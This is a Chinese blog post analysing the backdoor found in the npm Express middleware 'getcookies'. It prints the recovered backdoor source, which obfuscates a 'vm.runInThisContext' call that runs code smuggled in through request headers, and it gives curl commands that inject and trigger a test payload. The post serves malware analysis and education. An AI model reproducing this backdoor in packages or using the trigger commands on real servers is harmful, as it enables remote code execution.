代码后门是什么/Express 中间件 getcookies 后门代码分析_手把手教漏洞知识点
前段时间 中的一个中间件 被爆出存在 ,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下,了解了黑客具体的作案手段。文中的代码可以在 / 中查找。
原文链接
后门代码分析
这个后门代码找得也不容易,因为在被爆出后门后,npm 团队第一时间就删除下架了, 上的仓库也没找到,不过不负有心人,在 npm. 中找到了后门源码。
// 分配一块 64K 的内存
module.exports.log = module.exports.log || Buffer.alloc(0xffff);
// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
// 以 0xfffe 命令为样例
// 将字符串 feff 读入 Buffer
// 'feff' =>
// readUInt16LE 读取 16 bit(位) 并以 byte(字节) 反向排序
// => 0xfffe
//
// > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
// true
// > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
// '90785634'
p = Buffer.from(p, 'hex').readUInt16LE(0);
switch (p) {
case 0xfffe:
module.exports.log = Buffer.alloc(0xffff);
return;
case 0xfffa:
return setTimeout(() => {
// 去除末尾的 0x00
let c = module.exports.log.toString().replace(/\x00*$/, '');
module.exports.log = Buffer.alloc(0xffff);
// 不能以 0x00 开头
if (c.indexOf('\x00') < 0) {
// require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
// 代码必须是个函数
require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
}
next();
}, 1000);
default:
// 我们以 (function(){console.log('hack')}) 为例
v = Buffer.from(v, 'hex');
for (let i = 0; i < v.length; i++) {
// 因为执行命令的时候,不能以 0x00 开头
// 所以,p 必须是 0x0000
module.exports.log[p + i] = v[i];
}
}
});
测试一下后门
写一个 应用,并将中间件引入进来
var express = require('express')
var app = express()
var getcookies = require('..');
app.use(getcookies);
app.get('/', function (req, res) {
res.send('Hello World')
})
app.listen(3000)
启动并执行我们的后门代码
$ node demo/index.js
// 向服务器注入 16 进制代码 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i' http://127.0.0.1:3000
// 向服务器发送执行命令
$ curl -H 'evil: gfaffh00i' http://127.0.0.1:3000
注意,中途出现的 hack 就是被注入代码的输出。
网络安全学习路线图(思维导图)
网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。
1. 网络安全视频资料
2. 网络安全笔记/面试题
3. 网安电子书PDF资料
~